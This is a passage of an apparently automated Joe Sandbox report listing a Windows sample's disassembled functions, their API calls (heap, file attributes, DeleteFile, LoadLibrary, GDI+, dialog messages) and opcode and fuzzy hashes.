                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: e97a9482feccc88c3fceab5e8e282843224e171832a6f3be6dda874d26be59b6
                                                                                                                    • Instruction ID: 66507f8e0fa5d83cf672deabfebb8276013f7cdfe0c645f3083b7bd830cefb22
                                                                                                                    • Opcode Fuzzy Hash: e97a9482feccc88c3fceab5e8e282843224e171832a6f3be6dda874d26be59b6
                                                                                                                    • Instruction Fuzzy Hash: 0E11C230600604ABD724E628C889BB6BFEDBB45360F544A69E953F26D0D770AD49C760
                                                                                                                    Function 005A8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A8E75
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,005C1098,005817CE,?,?,00000007,?,?,?,005813D6,?,00000000), ref: 005A8EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: fc707486ad071a807faeebc23fa2730f8d57a5f269121e07ce8421e383584d54
                                                                                                                    • Instruction ID: d8f3bb32f1ab07cd113b6f3bd076d30d1466e1027c81a8ab7ec7b3e79890e618
                                                                                                                    • Opcode Fuzzy Hash: fc707486ad071a807faeebc23fa2730f8d57a5f269121e07ce8421e383584d54
                                                                                                                    • Instruction Fuzzy Hash: 09F09632601216E6DB212A65AC09B7F7F5CBFD3B70F244525F814AA191DF70DD0095A1
                                                                                                                    Function 0059109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 005910AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 005910B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: b360a44fc18de571ea785e8a9e9ecb9ddf9c28d3826dfaa4c9d28eed2502bd45
                                                                                                                    • Instruction ID: ae0f7fd8596a72eec75175852ec91c55c3b9d7d9295626ea0d1f811a10826d9d
                                                                                                                    • Opcode Fuzzy Hash: b360a44fc18de571ea785e8a9e9ecb9ddf9c28d3826dfaa4c9d28eed2502bd45
                                                                                                                    • Instruction Fuzzy Hash: 83E0D836F0055AA7DF0997B49C0D8EB7BDDFA542443104175E403E3101F931EE454664
                                                                                                                    Function 0058A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: f6f14914679f555e5feae4fc72f08eb9281f3de922f40347de46309bb47dd690
                                                                                                                    • Instruction ID: c0f813d38bef52d523cf053d570f9dadd02d1ea8584fedd499603d03247eae2c
                                                                                                                    • Opcode Fuzzy Hash: f6f14914679f555e5feae4fc72f08eb9281f3de922f40347de46309bb47dd690
                                                                                                                    • Instruction Fuzzy Hash: F6F0303124010ABBEF016F60DC49FDA3B6CBF15385F448051BD45E5164DB71EAD9EB50
                                                                                                                    Function 0058A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641,000000FF), ref: 0058A1F1
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641), ref: 0058A21F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    • Opcode ID: ac36843700c4cdcd3283c12d597e08f2f1ad43561e94c0c1c9ddff8070d72f29
                                                                                                                    • Instruction ID: 194841a59b22ace695270cd8fe1da4c6510aada506eb003ac8539bfc50fed52e
                                                                                                                    • Opcode Fuzzy Hash: ac36843700c4cdcd3283c12d597e08f2f1ad43561e94c0c1c9ddff8070d72f29
                                                                                                                    • Instruction Fuzzy Hash: 4AE092351442096BEB11AF60DC49FD97B5CBF18382F484061BD45E2050EB61EE89EB50
                                                                                                                    Function 0059AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,005B2641,000000FF), ref: 0059ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,005B2641,000000FF), ref: 0059ACB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    • Opcode ID: 6b6c80f4559a2a3535d8847bd5c2c46c9f9775d6e604571f63c97fb1cb3acade
                                                                                                                    • Instruction ID: f35658baeae2eb8fde10b26ffd89902a6cc98681c485a10cec6087ae73d479a1
                                                                                                                    • Opcode Fuzzy Hash: 6b6c80f4559a2a3535d8847bd5c2c46c9f9775d6e604571f63c97fb1cb3acade
                                                                                                                    • Instruction Fuzzy Hash: E9E03972604A50EFCB059B58DC46B49FBA9FB88A20F00426AA416936A0CB74B800CA90
                                                                                                                    Function 0058A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0058A23A,?,0058755C,?,?,?,?), ref: 0058A254
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0058A23A,?,0058755C,?,?,?,?), ref: 0058A280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 311a114590316df500c8d2048c426882d9b53fb5ab6d4f4a77c5612e00ebf314
                                                                                                                    • Instruction ID: 9b68c07fab4f02a7769688dc7547e616f36fe1801c94cab7511b25f6a2bc2e7d
                                                                                                                    • Opcode Fuzzy Hash: 311a114590316df500c8d2048c426882d9b53fb5ab6d4f4a77c5612e00ebf314
                                                                                                                    • Instruction Fuzzy Hash: 5AE06D355001289BDB60BB64CC0ABD97B58AB183E2F044261BD45F3190D6709E458BA0
                                                                                                                    Function 0059DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0059DEEC
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0059DF03
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: d5534d0a017b73903d000f1e7e151dbda5151a85ffc000174695086aadf0514f
                                                                                                                    • Instruction ID: 123d2559bcacdeb6843ea0279d69ac568683b0902f9629b1b638224576f116d8
                                                                                                                    • Opcode Fuzzy Hash: d5534d0a017b73903d000f1e7e151dbda5151a85ffc000174695086aadf0514f
                                                                                                                    • Instruction Fuzzy Hash: 27E09B714042496ADF01B761DC0FFAF3F6C6B15789F040451B640EB0A2E974DA149761
                                                                                                                    Function 0059081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: bbeef786a2bcf2f86549ccbcae599b07364f2ceab0932609da6e2f2487d52420
                                                                                                                    • Instruction ID: eea187223c327a06bbde99803aeb9f10d686221b366d0de98011b7ffa821e834
                                                                                                                    • Opcode Fuzzy Hash: bbeef786a2bcf2f86549ccbcae599b07364f2ceab0932609da6e2f2487d52420
                                                                                                                    • Instruction Fuzzy Hash: 3AE09272401118AADF00A7909C0DFDA7BACFF09381F0400657644E2004DA74EA848BA0
                                                                                                                    Function 0059A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0059A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0059A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: 6f7bf54320af110d2aed6afe7b73cdd4f00a1ac998f8e1ad357395342e038858
                                                                                                                    • Instruction ID: da47d6a418f94d1e0d4bf1771a67f4571a727b3f57c3b03f7baf532ea547e11c
                                                                                                                    • Opcode Fuzzy Hash: 6f7bf54320af110d2aed6afe7b73cdd4f00a1ac998f8e1ad357395342e038858
                                                                                                                    • Instruction Fuzzy Hash: 70E0ED71500218EBCF10DF55C945799BFE8FB04360F20C45AE84693201E774AE04DBA1
                                                                                                                    Function 005A2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A2BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005A2BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: 767cad2add9da423d5e5ed3d27e5776c96af7b87a40220e43e6667bef454f908
                                                                                                                    • Instruction ID: de9656b0d8edf0fb8f70b4905955dee368cebcda87f22c10817ea1f37fd2359b
                                                                                                                    • Opcode Fuzzy Hash: 767cad2add9da423d5e5ed3d27e5776c96af7b87a40220e43e6667bef454f908
                                                                                                                    • Instruction Fuzzy Hash: 42D0A93429420A5A4E182A7D390F58C2F49BD93BB8FA0868AF421D58C1EE509040A131
                                                                                                                    Function 005812F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: d41481d7d649edb8d261232570e054cf7dcc5971d3ae759bbf4dee799087f5d3
                                                                                                                    • Instruction ID: 457a0f8fb634ad03fe2def73aa3288b0aeb24d74a58f1de2381edb731f97fba9
                                                                                                                    • Opcode Fuzzy Hash: d41481d7d649edb8d261232570e054cf7dcc5971d3ae759bbf4dee799087f5d3
                                                                                                                    • Instruction Fuzzy Hash: 45C0123205C280BECB090BB4DC0DC2BBBA8ABA5312F04C92CB0E5C2060C238C114EB11
                                                                                                                    Function 00581A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 080785c0add31a3eaa018b2a3d07e25d522d6220149ccf09e5a1fc3a924b3c76
                                                                                                                    • Instruction ID: e0229206a5fb17dfaae9cb806b47c9f1d0decb9a425b5cf50d6d708e13fd0acf
                                                                                                                    • Opcode Fuzzy Hash: 080785c0add31a3eaa018b2a3d07e25d522d6220149ccf09e5a1fc3a924b3c76
                                                                                                                    • Instruction Fuzzy Hash: 45C1D170A00A549FEF15EF68C488BA97FA9BF55310F0805B9EC45EB382DB309D46CB65
                                                                                                                    Function 00583BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 1c768d66f97fca1eed3952c54bf68456c10c5e6b2285af5972757d6cd070386b
                                                                                                                    • Instruction ID: 04c42129f816bbb1bd8e934effbeb06cfe61afece8c14959777e9d0aaabe7317
                                                                                                                    • Opcode Fuzzy Hash: 1c768d66f97fca1eed3952c54bf68456c10c5e6b2285af5972757d6cd070386b
                                                                                                                    • Instruction Fuzzy Hash: AB71D371500B459EDB25EB70C8499E7BFE9BF54701F400C2EE9ABA7241DA327A44CF11
                                                                                                                    Function 00588284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00588289
                                                                                                                      • Part of subcall function 005813DC: __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 0058A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
